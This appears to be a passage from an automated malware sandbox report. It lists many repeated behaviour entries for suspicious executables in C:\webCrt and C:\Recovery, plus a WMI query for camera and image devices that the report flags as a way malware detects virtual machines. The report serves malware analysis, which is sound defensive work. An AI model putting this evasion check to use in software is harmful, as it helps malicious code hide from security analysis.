Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\webCrt\Surrogatedll.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Recovery\EeMFgDHDyZvTl.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\EeMFgDHDyZvTl.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
